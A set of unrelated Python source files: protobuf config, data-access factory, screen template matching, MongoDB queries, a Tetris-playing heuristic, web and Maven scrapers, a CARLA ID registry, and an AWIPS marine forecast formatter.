has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='steps_per_eval', full_name='second.protos.TrainConfig.steps_per_eval', index=2,
number=3, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='save_checkpoints_secs', full_name='second.protos.TrainConfig.save_checkpoints_secs', index=3,
number=4, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='save_summary_steps', full_name='second.protos.TrainConfig.save_summary_steps', index=4,
number=5, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='enable_mixed_precision', full_name='second.protos.TrainConfig.enable_mixed_precision', index=5,
number=6, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='loss_scale_factor', full_name='second.protos.TrainConfig.loss_scale_factor', index=6,
number=7, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='clear_metrics_every_epoch', full_name='second.protos.TrainConfig.clear_metrics_every_epoch', index=7,
number=8, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=108,
serialized_end=358,
)
_TRAINCONFIG.fields_by_name['optimizer'].message_type = second_dot_protos_dot_optimizer__pb2._OPTIMIZER
DESCRIPTOR.message_types_by_name['TrainConfig'] = _TRAINCONFIG
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
TrainConfig = _reflection.GeneratedProtocolMessageType('TrainConfig', (_message.Message,), {
'DESCRIPTOR' : _TRAINCONFIG,
'__module__' : 'second.protos.train_pb2'
# @@protoc_insertion_point(class_scope:second.protos.TrainConfig)
})
_sym_db.RegisterMessage(TrainConfig)
# @@protoc_insertion_point(module_scope)
|
python
|
'''
Created on Nov 9, 2011
@author: ppa
'''
from analyzer.lib.errors import Errors, UfException
class DAMFactory(object):
''' DAM factory '''
@staticmethod
def createDAM(dam_name, config):
''' create DAM '''
if 'yahoo' == dam_name:
from analyzerdam.yahooDAM import YahooDAM
dam=YahooDAM()
elif 'google' == dam_name:
from analyzerdam.google import GoogleDAM
dam=GoogleDAM()
elif 'excel' == dam_name:
from analyzerdam.excelDAM import ExcelDAM
dam=ExcelDAM()
elif 'hbase' == dam_name:
from analyzerdam.hbaseDAM import HBaseDAM
dam=HBaseDAM()
elif 'sql' == dam_name:
from analyzerdam.sqlDAM import SqlDAM
dam=SqlDAM(config)
elif 'cex' == dam_name:
from analyzerdam.cex import CexDAM
dam=CexDAM(config)
else:
raise UfException(Errors.INVALID_DAM_TYPE,
"DAM type is invalid %s" % dam_name)
return dam
@staticmethod
def getAvailableTypes():
''' return all available types '''
        return ['yahoo', 'google', 'excel', 'hbase', 'sql', 'cex']
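# Minimal usage sketch (assumes the analyzerdam package and the requested DAM
# module are importable in the current environment):
if __name__ == '__main__':
    dam = DAMFactory.createDAM('yahoo', None)
    print(type(dam).__name__)              # -> YahooDAM
    print(DAMFactory.getAvailableTypes())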
|
python
|
from pydantic import BaseModel
class ProfileStats(BaseModel):
visits: int = 0
views: int = 0
counters: dict = {}
|
python
|
import pyautogui
import time
import cv2
import numpy as np
import imutils
def ImageDetection(temp_img,threshold,img_type):
image = pyautogui.screenshot()
img_bgr = cv2.cvtColor(np.array(image), cv2.COLOR_RGB2BGR)
img_gray = cv2.cvtColor(img_bgr, cv2.COLOR_BGR2GRAY)
    # flag 0 reads the template directly in grayscale, so no colour conversion is needed
    template = cv2.imread(temp_img,0)
    temp_gray = template
    temp_edged = cv2.Canny(temp_gray, 50, 200)
w, h = template.shape[::-1]
found = None
if img_type == "grayscale":
selected_img = img_gray
selected_temp_img = temp_gray
if img_type == "edged":
selected_img = img_gray
selected_temp_img = temp_edged
for scale in np.linspace(0.2, 1.0, 20)[::-1]:
# resize the image according to the scale, and keep track
# of the ratio of the resizing
resized = imutils.resize(selected_img, width = int(selected_img.shape[1] * scale))
r = selected_img.shape[1] / float(resized.shape[1])
        # if the resized image is smaller than the template, break from the loop;
        # otherwise detect edges in the resized image (for "edged" mode), apply
        # template matching, and update `found` whenever a new maximum correlation
        # above the threshold is seen
if resized.shape[0] < h or resized.shape[1] < w:
break
if img_type == "edged":
img_edged = cv2.Canny(resized, 50, 200)
resized = img_edged
result = cv2.matchTemplate(resized, selected_temp_img, cv2.TM_CCOEFF_NORMED)
(_, maxVal, _, maxLoc) = cv2.minMaxLoc(result)
if found is None or maxVal > found[0]:
# print(maxVal,maxLoc,r)
if maxVal > threshold:
found = (maxVal, maxLoc, r)
# unpack the found varaible and compute the (x, y) coordinates
# of the bounding box based on the resized ratio
    if found is not None:
(_, maxLoc, r) = found
# print("final :",found)
(startX, startY) = (int(maxLoc[0] * r), int(maxLoc[1] * r))
(endX, endY) = (int((maxLoc[0] + w) * r), int((maxLoc[1] + h) * r))
x = (startX + endX)/2
y = (startY + endY)/2
return x,y
else:
return None
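# Minimal usage sketch (assumes a template image exists at the given path; the
# path, threshold and mode below are illustrative placeholders):
if __name__ == "__main__":
    pos = ImageDetection("button.png", 0.8, "grayscale")
    if pos is not None:
        x, y = pos
        pyautogui.click(x, y)   # click the centre of the matched region
    else:
        print("template not found on screen")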
|
python
|
"""
Finds the dictionary for the measurement specification based on the name of the measurement.
"""
def find_measurement_spec(monitoring_system_specs, measurement_type):
"""
Scans the list of specs and returns dictionary of specifications for the named measurement type
Parameters
----------
monitoring_system_specs: list
The list of all measurement specs for a monitoring system
measurement_type: str
The name of the measurement type to be located
Returns
-------
dict
measurement specifications
"""
for specs in monitoring_system_specs:
for measurement in specs.items():
if measurement[1]['type']['name'] == measurement_type:
return measurement[1]
if __name__ == '__main__':
name = 'auxiliary_power'
monitoring_system_specs=[{'measurement_spec': {'name': 'HPP VA W 8% EP',
'description': 'Heat pump power, volt-amps, electrical panel',
'type': {'name': 'heatpump_power',
'msp_columns': None,
'description': ''},
'accuracy': '8.00000',
'accuracy_pct': True,
'meas_bias_abs': 0.0,
'meas_bias_pct': 0.0,
'location': {'name': 'Electrical Panel',
'description': ''},
'unit': {'name': 'W',
'description': 'watts'}}},
{'measurement_spec': {'name': 'HPP VA W 8% EP',
'description': 'Heat pump power, volt-amps, electrical panel',
'type': {'name': 'auxiliary_power',
'msp_columns': None,
'description': ''},
'accuracy': '8.00000',
'accuracy_pct': True,
'meas_bias_abs': 0.0,
'meas_bias_pct': 0.0,
'location': {'name': 'Electrical Panel',
'description': ''},
'unit': {'name': 'W',
'description': 'watts'}}}]
measurement_spec = find_measurement_spec(monitoring_system_specs, name)
|
python
|
# HeadPhoneJacks Cause Vaccines
# Softdev2 pd8
# K#06: Yummy Mango Py
#2019-02-28
import pymongo
SERVER_ADDR=""
connection =pymongo.MongoClient(SERVER_ADDR)
db = connection.test
collection = db.restaurants
def boro_find(borough):
'''
finds restaurants by borough and returns them in a list.
'''
restuarants = collection.find({'borough':borough})
return [restuarant for restuarant in restuarants]
def zip_find(zip):
'''
finds restaurants by zip and returns them in a list.
'''
zip = str(zip)
restuarants = collection.find({'address.zipcode':zip})
return [restuarant for restuarant in restuarants]
def zip_grade_find(zip, grade):
'''
finds restaurants by zip and grade and returns them in a list.
'''
zip = str(zip)
restuarants = collection.find(
{'$and':[
{'address.zipcode':zip},
{'grades.0.grade':grade},
]
}
)
return [restuarant for restuarant in restuarants]
def zip_score_find(zip, score):
'''
    finds restaurants by zip whose first listed grade score is less than the given score and returns them in a list.
'''
zip = str(zip)
restuarants = collection.find(
{'$and':[
{'address.zipcode':zip},
{'grades.0.score':{'$lt':score}}, #nums are scores
]
}
)
return [restuarant for restuarant in restuarants]
def cuisine_score_boro_find(cuisine, score, borough):
'''
    finds restaurants by cuisine and borough whose first listed grade score is greater than the given score and returns them in a list.
'''
restuarants = collection.find(
{'$and':[
{'cuisine':cuisine},
{'grades.0.score':{'$gt':score}}, #nums are scores
{'borough': borough},
]
}
)
return [restuarant for restuarant in restuarants]
if __name__ == '__main__':
print('Printing borough...')
print(boro_find('Bronx'))
print('Printing zip....')
print(zip_find(11104))
print('Printing borough and zip...')
print(zip_grade_find(11104, 'A'))
print('Printing zip and score...')
print(zip_score_find(11104, 200))
print('Printing cuisine, score, and borough...')
print(cuisine_score_boro_find('Chinese', 40, 'Manhattan'))
|
python
|
'''
Function:
    AI plays Tetris
Author:
    Charles
WeChat official account:
    Charles的皮卡丘
'''
import copy
import math
from modules.utils import *
'''AI that plays Tetris'''
class TetrisAI():
def __init__(self, inner_board):
self.inner_board = inner_board
    '''Get the next action'''
def getNextAction(self):
if self.inner_board.current_tetris == tetrisShape().shape_empty:
return None
action = None
        # direction range of the currently controllable tetromino
if self.inner_board.current_tetris.shape in [tetrisShape().shape_O]:
current_direction_range = [0]
elif self.inner_board.current_tetris.shape in [tetrisShape().shape_I, tetrisShape().shape_Z, tetrisShape().shape_S]:
current_direction_range = [0, 1]
else:
current_direction_range = [0, 1, 2, 3]
        # direction range of the next tetromino
if self.inner_board.next_tetris.shape in [tetrisShape().shape_O]:
next_direction_range = [0]
elif self.inner_board.next_tetris.shape in [tetrisShape().shape_I, tetrisShape().shape_Z, tetrisShape().shape_S]:
next_direction_range = [0, 1]
else:
next_direction_range = [0, 1, 2, 3]
        # simple AI algorithm
for d_now in current_direction_range:
x_now_min, x_now_max, y_now_min, y_now_max = self.inner_board.current_tetris.getRelativeBoundary(d_now)
for x_now in range(-x_now_min, self.inner_board.width - x_now_max):
board = self.getFinalBoardData(d_now, x_now)
for d_next in next_direction_range:
x_next_min, x_next_max, y_next_min, y_next_max = self.inner_board.next_tetris.getRelativeBoundary(d_next)
distances = self.getDropDistances(board, d_next, range(-x_next_min, self.inner_board.width-x_next_max))
for x_next in range(-x_next_min, self.inner_board.width-x_next_max):
score = self.calcScore(copy.deepcopy(board), d_next, x_next, distances)
if not action or action[2] < score:
action = [d_now, x_now, score]
return action
    '''Get the board data after the current tetromino drops to the lowest point at the given position and direction'''
def getFinalBoardData(self, d_now, x_now):
board = copy.deepcopy(self.inner_board.getBoardData())
dy = self.inner_board.height - 1
for x, y in self.inner_board.current_tetris.getAbsoluteCoords(d_now, x_now, 0):
count = 0
while (count + y < self.inner_board.height) and (count + y < 0 or board[x + (count + y) * self.inner_board.width] == tetrisShape().shape_empty):
count += 1
count -= 1
if dy > count:
dy = count
return self.imitateDropDown(board, self.inner_board.current_tetris, d_now, x_now, dy)
    '''Simulate a drop to the lowest point and return the resulting board data'''
def imitateDropDown(self, board, tetris, direction, x_imitate, dy):
for x, y in tetris.getAbsoluteCoords(direction, x_imitate, 0):
board[x + (y + dy) * self.inner_board.width] = tetris.shape
return board
    '''Get, for each x in x_range, the drop distance of the next tetromino (in the given orientation) to the lowest point'''
def getDropDistances(self, board, direction, x_range):
dists = {}
for x_next in x_range:
if x_next not in dists:
dists[x_next] = self.inner_board.height - 1
for x, y in self.inner_board.next_tetris.getAbsoluteCoords(direction, x_next, 0):
count = 0
while (count + y < self.inner_board.height) and (count + y < 0 or board[x + (count + y) * self.inner_board.width] == tetrisShape().shape_empty):
count += 1
count -= 1
if dists[x_next] > count:
dists[x_next] = count
return dists
    '''Compute the score of a candidate placement'''
def calcScore(self, board, d_next, x_next, distances):
        # simulate the next tetromino dropping to the bottom with this placement
board = self.imitateDropDown(board, self.inner_board.next_tetris, d_next, x_next, distances[x_next])
width, height = self.inner_board.width, self.inner_board.height
        # score after the next tetromino reaches the bottom with this plan (number of clearable lines)
removed_lines = 0
        # hole statistics
hole_statistic_0 = [0] * width
hole_statistic_1 = [0] * width
        # number of blocks
num_blocks = 0
        # number of holes
num_holes = 0
        # highest point of the stacked tetrominoes at each x position
roof_y = [0] * width
for y in range(height-1, -1, -1):
            # whether this row has a hole
has_hole = False
            # whether this row has a block
has_block = False
for x in range(width):
if board[x + y * width] == tetrisShape().shape_empty:
has_hole = True
hole_statistic_0[x] += 1
else:
has_block = True
roof_y[x] = height - y
if hole_statistic_0[x] > 0:
hole_statistic_1[x] += hole_statistic_0[x]
hole_statistic_0[x] = 0
if hole_statistic_1[x] > 0:
num_blocks += 1
if not has_block:
break
if not has_hole and has_block:
removed_lines += 1
        # sum of the hole counts, each raised to the power 0.7
num_holes = sum([i ** .7 for i in hole_statistic_1])
        # highest point
max_height = max(roof_y) - removed_lines
        # first-order differences of roof_y
roof_dy = [roof_y[i]-roof_y[i+1] for i in range(len(roof_y)-1)]
        # compute the standard deviation via E(x^2) - E(x)^2
if len(roof_y) <= 0:
roof_y_std = 0
else:
roof_y_std = math.sqrt(sum([y**2 for y in roof_y]) / len(roof_y) - (sum(roof_y) / len(roof_y)) ** 2)
if len(roof_dy) <= 0:
roof_dy_std = 0
else:
roof_dy_std = math.sqrt(sum([dy**2 for dy in roof_dy]) / len(roof_dy) - (sum(roof_dy) / len(roof_dy)) ** 2)
        # sum of the absolute values of roof_dy
abs_dy = sum([abs(dy) for dy in roof_dy])
        # difference between the maximum and minimum roof heights
max_dy = max(roof_y) - min(roof_y)
        # compute the final score
score = removed_lines * 1.8 - num_holes * 1.0 - num_blocks * 0.5 - max_height ** 1.5 * 0.02 - roof_y_std * 1e-5 - roof_dy_std * 0.01 - abs_dy * 0.2 - max_dy * 0.3
return score
|
python
|
import requests
import urllib.request
import time
from bs4 import BeautifulSoup
import json
import csv
filecsv = open('SouqDataapple.csv', 'w',encoding='utf8')
# Set the URL you want to webscrape from
url = 'https://saudi.souq.com/sa-ar/apple/new/a-c/s/?section=2&page='
file = open('SouqDataapple.json','w',encoding='utf8')
file.write('[\n')
data = {}
csv_columns = ['name','price','img']
writer = csv.DictWriter(filecsv, fieldnames=csv_columns)
# write the CSV header once, before the page loop
writer.writeheader()
for page in range(1000):
    print('---', page, '---')
    r = requests.get(url + str(page))
    print(url + str(page))
    soup = BeautifulSoup(r.content, "html.parser")
    ancher=soup.find_all('div',{'class' : 'column column-block block-grid-large single-item'})
for pt in ancher:
name=pt.find('h6', {'class' : 'title itemTitle'})
itemPrice=pt.find('span', {'class' : 'itemPrice'})
img=pt.find('img', {'class' : 'img-size-medium'})
if img:
writer.writerow({'name': name.text.replace(' ', '').strip('\r\n'), 'price': itemPrice.text, 'img': img.get('src')})
data['name'] =name.text.replace(' ', '').strip('\r\n')
data['price'] =itemPrice.text
data['img'] =img.get('src')
json_data = json.dumps(data,ensure_ascii=False)
file.write(json_data)
file.write(",\n")
file.write("\n]")
filecsv.close()
file.close()
|
python
|
#!/usr/bin/python
#
# Scraper for libraries hosted at jcenter and custom maven repos
# Retrieves jar|aar files along with some meta data
# @author erik derr [[email protected]]
#
import sys
import json
import urllib2
import datetime
import os
import errno
import zipfile
import traceback
import xml.etree.ElementTree as ElementTree
from retrying import retry # may require "pip install retrying"
## functions ##
def make_sure_path_exists(path):
try:
os.makedirs(path)
except OSError as exception:
if exception.errno != errno.EEXIST:
raise
def write_library_description(fileName, libName, category, version, date, comment):
make_sure_path_exists(os.path.dirname(fileName))
# write lib description in xml format
with open(fileName, "w") as desc:
desc.write("<?xml version=\"1.0\"?>\n")
desc.write("<library>\n")
desc.write(" <!-- library name -->\n")
desc.write(" <name>{}</name>\n".format(libName))
desc.write("\n")
desc.write(" <!-- Advertising, Analytics, Android, SocialMedia, Cloud, Utilities -->\n")
desc.write(" <category>{}</category>\n".format(category))
desc.write("\n")
desc.write(" <!-- optional: version string -->\n")
desc.write(" <version>{}</version>\n".format(version))
desc.write("\n")
desc.write(" <!-- optional: date (format: DD/MM/YYYY) -->\n")
desc.write(" <releasedate>{}</releasedate>\n".format(date))
desc.write("\n")
desc.write(" <!-- optional: comment -->\n")
desc.write(" <comment>{}</comment>\n".format(comment))
desc.write("</library>\n")
@retry(urllib2.URLError, tries=3, delay=3, backoff=1)
def urlopen_with_retry(URL):
return urllib2.urlopen(URL)
def downloadFile(targetDir, repoURL, groupid, artefactid, version, filetype):
make_sure_path_exists(os.path.dirname(targetDir + "/"))
# assemble download URL
fileName = artefactid + "-" + version + "." + filetype
URL = repoURL + "/" + groupid.replace(".","/") + "/" + artefactid.replace(".","/") + "/" + version + "/" + fileName
# retrieve and save file
targetFile = targetDir + "/" + fileName
try:
libFile = urllib2.urlopen(URL)
with open(targetFile,'wb') as output:
output.write(libFile.read())
return 0
except urllib2.HTTPError, e:
if filetype != 'aar':
print ' !! HTTP Error while retrieving ' + filetype + ' file: ' + str(e.code)
return 1
except urllib2.URLError, e:
print ' !! URL Error while retrieving ' + filetype + ' file: ' + str(e.reason)
return 1
except Exception, excp:
print ' !! Download failed: ' + str(excp)
return 1
def updateLibrary(libName, category, comment, repoURL, groupId, artefactId):
# replace all blanks with dash
libName = libName.replace(" ", "-")
print " # check library " + libName + " [" + category + "] (g:\"" + groupId + "\" AND a:\"" + artefactId + "\")"
baseDirName = rootDir + category + "/" + libName + "/"
dir = os.path.dirname(baseDirName)
make_sure_path_exists(dir);
# Assemble base URL and retrieve meta data
try:
mvnURL = repoURL + "/" + groupId.replace(".","/") + "/" + artefactId.replace(".","/")
metaURL = mvnURL + "/maven-metadata.xml"
response = urllib2.urlopen(metaURL)
data = response.read()
response.close()
except urllib2.URLError, e:
print 'URLError = ' + str(e.reason)
return
except Exception, excp:
print 'Could not retrieve meta data for ' + libName + ' [SKIP] (' + str(excp) + ')'
return
# retrieve available versions
versions = []
root = ElementTree.fromstring(data)
for vg in root.find('versioning'):
for v in vg.iter('version'):
if not skipAlphaBeta or (skipAlphaBeta and not '-alpha' in v.text and not '-beta' in v.text and not '-rc' in v.text and not '-dev' in v.text):
versions.append(v.text)
numberOfVersions = len(versions)
print " - retrieved meta data for " + str(numberOfVersions) + " versions:"
numberOfUpdates = 0
if numberOfVersions > 0:
for version in versions:
# skip lib version if already existing
if not os.path.isfile(baseDirName + "/" + version + "/" + libDescriptorFileName):
numberOfUpdates += 1
targetDir = baseDirName + version
print " - update version: {} type: {} date: {} target-dir: {}".format(version, "aar/jar", "n/a", targetDir)
result = downloadFile(targetDir, repoURL, groupId, artefactId, version, "aar")
if result == 1:
result = downloadFile(targetDir, repoURL, groupId, artefactId, version, "jar")
if result == 0:
# write lib description
fileName = targetDir + "/" + "library.xml"
write_library_description(fileName, libName, category, version, "", comment)
if numberOfUpdates == 0:
print " -> all versions up-to-date"
## Main functionality ##
inputFile = "glibs.json"
libDescriptorFileName = "library.xml"
rootDir = "my-mvn-repo/"
skipAlphaBeta = True # skip alpha and beta versions
print "== maven/jcenter scraper =="
# Requires one argument (path to json file with library descriptions)
args = len(sys.argv)
if args != 2:
print "Usage: " + sys.argv[0] + " <libraries.json>"
sys.exit(1)
else:
inputFile = sys.argv[1]
print "Load libraries from " + sys.argv[1]
# load iterate over lib json
with open(inputFile) as ifile:
data = json.load(ifile)
# update each lib
for lib in data["libraries"]:
if 'repo' not in lib:
repoURL = "http://jcenter.bintray.com"
else:
repoURL = lib['repo'] # custom maven
updateLibrary(lib["name"], lib["category"], lib["comment"], repoURL, lib["groupid"], lib["artefactid"])
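# Illustrative sketch of the expected input JSON structure (field names match the
# lookups above; the concrete library values are placeholders, not real entries):
#
# {
#   "libraries": [
#     { "name": "Some Library", "category": "Utilities", "comment": "",
#       "groupid": "com.example", "artefactid": "some-library",
#       "repo": "https://repo.example.com/maven2" }
#   ]
# }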
|
python
|
#!/usr/bin/env python
#
# Copyright (c) 2018 Intel Labs.
#
# authors: Bernd Gassmann ([email protected])
#
"""
Actor registry class for carla-id mapping
"""
class ActorIdRegistry(object):
"""
Registry class to map carla-ids (potentially 64 bit)
to increasing numbers (usually not exceeding 32 bit)
"""
def __init__(self):
"""
Constructor
"""
self.id_lookup_table = {}
def get_id(self, actor_id):
"""
Return a unique counting id for the given actor_id
:param actor_id: the id of a carla.Actor object
:type actor_id: int64
:return: mapped id of the actor (unique increasing counter value)
:rtype: uint32
"""
if actor_id not in self.id_lookup_table:
self.id_lookup_table[actor_id] = len(self.id_lookup_table) + 1
return self.id_lookup_table[actor_id]
def get_id_string(self, actor_id):
"""
Return a string of a unique counting id for the given actor_id
:param actor_id: the id of a carla.Actor object
:type actor_id: int64
:return: string with leading zeros of mapped id of the actor
(unique increasing counter value)
:rtype: string
"""
mapped_id = self.get_id(actor_id)
return "{:03d}".format(mapped_id)
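# Minimal usage sketch with made-up 64-bit actor ids (the values are illustrative only):
if __name__ == "__main__":
    registry = ActorIdRegistry()
    print(registry.get_id(281474976710656))         # -> 1
    print(registry.get_id(281474976710657))         # -> 2
    print(registry.get_id(281474976710656))         # -> 1 (same actor keeps its mapped id)
    print(registry.get_id_string(281474976710657))  # -> "002"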
|
python
|
##
# This software was developed and / or modified by Raytheon Company,
# pursuant to Contract DG133W-05-CQ-1067 with the US Government.
#
# U.S. EXPORT CONTROLLED TECHNICAL DATA
# This software product contains export-restricted data whose
# export/transfer/disclosure is restricted by U.S. law. Dissemination
# to non-U.S. persons whether in the United States or abroad requires
# an export license or other authorization.
#
# Contractor Name: Raytheon Company
# Contractor Address: 6825 Pine Street, Suite 340
# Mail Stop B8
# Omaha, NE 68106
# 402.291.0100
#
# See the AWIPS II Master Rights File ("Master Rights File.pdf") for
# further licensing information.
##
##
# This is a base file that is not intended to be overridden.
##
#-------------------------------------------------------------------------
# Description: This product creates a Near Shore Marine product.
#-------------------------------------------------------------------------
# Copying:
# This software is in the public domain, furnished "as is", without technical
# support, and with no warranty, express or implied, as to its usefulness for
# any purpose.
#-------------------------------------------------------------------------
# Standard and Local file names and Locations:
# NSH, NSH_<site>_<MultiPil>_Definition, NSH_<site>_Overrides
#-------------------------------------------------------------------------
# Customization Points:
#
# REQUIRED OVERRIDE:
# _lakeStmt -- override with correct lake name(s) for your site
#
# DEFINITION SECTION
#
# Required Configuration Items:
#
# displayName If not None, defines how product appears in GFE GUI
# defaultEditAreas defines edit areas, default is Combinations
#
# productName defines name of product e.g. "Zone Forecast Product"
# fullStationID Full station identifier, 4 letter, such as "KSLC".
# wmoID WMO ID code for product header, such as "FOUS45"
# pil Product pil, such as "SFTBOS"
# areaName (opt.) Area name for product header, such as "Western New York"
# wfoCityState WFO location, such as "Buffalo NY"
#
# Optional Configuration Items
# editAreaSuffix default None. Allows for generating the body of the product for
# an edit area that is a subset (e.g. population areas) of the
# edit areas specified in the defaultEditAreas. So given the edit area,
# "COZ035" and the editAreaSuffix is "_pt", then the edit area that
# will be sampled and reported for the body of the product will be
# "COZ035_pt". If no such edit area exists, the system will simply
# use the original edit area.
# Note that Hazards will always be generated for the entire edit area.
# mapNameForCombinations Name of the map background that is used for
# creating/editing the combinations file. This must
# be defined or the GFE zone combiner
# database Source database for product. Can be "Official",
# "Fcst" or "ISC"
# outputFile Defines the output location of the finished product
# when saved from the Formatter Launcher.
# debug If on, debug_print statements will appear.
# textdbPil Defines the awips product identifier
# (e.g., DENCCFDEN) that is used to store the product
# in the AWIPS text database.
# This value is also used for the default GUI entry for
# storage.
# awipsWANPil Defines the AWIPS product identifier
# (e.g., KBOUCCFDEN) that is used to transmit the
# product to the AWIPS WAN.
# This value is also used for the default GUI
# entry for storage.
# hazardSamplingThreshold Defines the percentage coverage or number of
# grid points in a zone that must contain the hazard
# in order for it to be considered. Tuple (percent, points)
#
#  periodCombining     If 1, an attempt will be made to combine components
#                      or time periods into one. Otherwise no period combining
#                      will be done.
# useAbbreviations
# If 1, use marine abbreviations e.g. TSTM instead of THUNDERSTORM, NW instead of NORTHWEST
# (See marine_abbreviateText in the TextRules module)
# areaDictionary Modify the AreaDictionary utility with UGC information about zones
# useHolidays Set to 1 to use holidays in the time period labels
#
# Weather-related flags
# hoursSChcEnds - specifies hours past the beginning of the first
# first period of the product to stop including 'Slight
# Chance' or 'Isolated' weather types (ERH policy
# allows values of 1-5 * 12 hour periods)
#
# Trouble-shooting items
# passLimit -- Limit on passes allowed through Narrative Tree
# trace -- Set to 1 to turn on trace through Narrative Tree
#
# NARRATIVE CUSTOMIZATION POINTS
# The phrases in this product can be customized in many ways by overriding
# infrastructure methods in the Local file.
# You will see common overrides in the Local file and you may change them
# there.
# For further customization, you can determine which phrases your product is
# using by examining the Component Product Definitions below.
# Then, you can look up the phrase in the Text Product User Guide which will
# describe all the relevant override methods associated with the phrase.
# Refer to the Customization section of the Text Product User Guide
# for step-by-step information.
#-------------------------------------------------------------------------
# Weather Elements Needed:
# To 2 days:
# Wind (every 3 hours)
# WaveHeight and/or WindWaveHgt (every 6 hours)
# Wx (every 6 hours)
# Sky (every 6 hours)
# Optional:
# WindGust (every 3 hours)
#-------------------------------------------------------------------------
# Edit Areas Needed:
#-------------------------------------------------------------------------
# Associated Utilities Files e.g. Combinations file:
# Combinations
#-------------------------------------------------------------------------
# Component Products:
# Hazards (optional): If Discrete grid provided, headlines will be generated.
# NSHPeriod
#-------------------------------------------------------------------------
#-------------------------------------------------------------------------
# Development tasks that are identified and in progress:
#
# To look up tasks and their status, see the Text Product User Guide
# Section on "Tkgnats: Task Reporting System".
#-------------------------------------------------------------------------
# Additional Information:
#
# COMMON OVERRIDES
# from CWF:
# _Text1
# _Text2
# _Text3
# _issuance_list
# from ConfigVariables:
# maximum_range_nlValue_dict
# minimum_range_nlValue_dict
# phrase_descriptor_dict
# scalar_difference_nlValue_dict
#
#-------------------------------------------------------------------------
# Example Output:
# Refer to the NWS Directives for Marine Services.
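#
# Illustrative sketch (not part of this baseline file): the required _lakeStmt
# override normally lives in the site's NSH_<site>_Overrides file and would look
# roughly like the following, with the lake name(s) filled in for your site:
#
#     def _lakeStmt(self, argDict):
#         return "For waters within five nautical miles of shore on Lake Superior"
#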
import TextRules
import SampleAnalysis
import ForecastNarrative
import time, string, re, types
### adding import of os for the MWW turnkey code at the end of the file
import os
class TextProduct(TextRules.TextRules, SampleAnalysis.SampleAnalysis):
VariableList = []
Definition = {
"type": "smart",
"displayName": "None",
"database": "Official",
# Defines output location of finished product.
"outputFile": "{prddir}/TEXT/NSH_<MultiPil>.txt",
"debug": 0,
# Name of map background for creating Combinations
"mapNameForCombinations": "Marine_Zones_<site>",
## Edit Areas: Create Combinations file with edit area combinations.
"showZoneCombiner" : 1, # 1 to cause zone combiner to display
"defaultEditAreas" : "Combinations_NSH_<site>_<MultiPil>",
"editAreaSuffix": None,
# product identifiers
"productName": "Nearshore Marine Forecast", # product name
"fullStationID": "<fullStationID>", # full station identifier (4letter)
"wmoID": "<wmoID>", # WMO ID
"pil": "<pil>", # Product pil
"areaName": "<state>", # Name of state, such as "Georgia"
"wfoCityState": "<wfoCityState>", # Location of WFO - city state
"textdbPil": "<textdbPil>", # Product ID for storing to AWIPS text database.
"awipsWANPil": "<awipsWANPil>", # Product ID for transmitting to AWIPS WAN.
"hazardSamplingThreshold": (10, None), #(%cov, #points)
"fixedExpire": 1, #ensure VTEC actions don't affect segment expiration time
"periodCombining" : 0, # If 1, combine periods, if possible
"lineLength": 66, # product line length
"useAbbreviations": 0, # Use marine abbreviations
# Area Dictionary -- Descriptive information about zones
"areaDictionary": "AreaDictionary",
"useHolidays": 0, # Set to 1 to use holidays in the time period labels
# Weather-related flags
"hoursSChcEnds": 24,
# Language
"language": "english",
# Trouble-shooting items
"passLimit": 20, # Limit on passes allowed through
# Narrative Tree
"trace": 0, # Set to 1 to turn on trace through
# Narrative Tree for trouble-shooting
}
def __init__(self):
TextRules.TextRules.__init__(self)
SampleAnalysis.SampleAnalysis.__init__(self)
self._outlookflag = 0
# TO BE OVERRIDDEN IN LOCAL FILE
def _Text1(self):
return ""
def _Text2(self):
return ""
def _Text3(self):
return ""
def _lakeStmt(self, argDict):
return "For waters within five nautical miles of shore on Lake (name)"
########################################################################
# OVERRIDING THRESHOLDS AND VARIABLES
########################################################################
### THRESHOLDS AND VARIABLES
### Analysis Class
### To override, override the associated method in your text product class.
def temporalCoverage_threshold(self, parmHisto, timeRange, componentName):
# Replaces IN_RANGE_THRESHOLD -- Note that this threshold is now used
# differently i.e. it is the percentage of the TIMERANGE covered by the
# grid in order to include it in the analysis
# Percentage of temporal coverage default value (if not found in temporalCoverage_dict)
# Used by temporalCoverage_flag
return 5.0
def temporalCoverage_dict(self, parmHisto, timeRange, componentName):
        # Replaces IN_RANGE_DICT -- Note that these thresholds are now used
return {
"LAL": 0,
"MinRH": 0,
"MaxRH": 0,
"MinT": 50,
"MaxT": 10,
"Haines": 0,
"Wx": 15,
"PoP" : 50,
}
# Uncomment any combinations you wish to collapse.
# For example, if the first entry is uncommented,
# the phrase: scattered rain showers and widespread rain
# will collapse to: scattered rain showers.
def wxCombinations(self):
return [
("RW", "R"),
("SW", "S"),
## ("T","RW"),
]
def vector_dir_difference_dict(self, tree, node):
# Direction difference. If the difference between directions
# for 2 sub-periods is greater than this value,
# the different directions will be noted in the phrase.
# Units are degrees
        return {
            "Wind": 40, # degrees
            "TransWind": 60, # degrees
            "FreeWind": 60, # degrees
"Swell":60, # degrees
"Swell2":60, # degrees
}
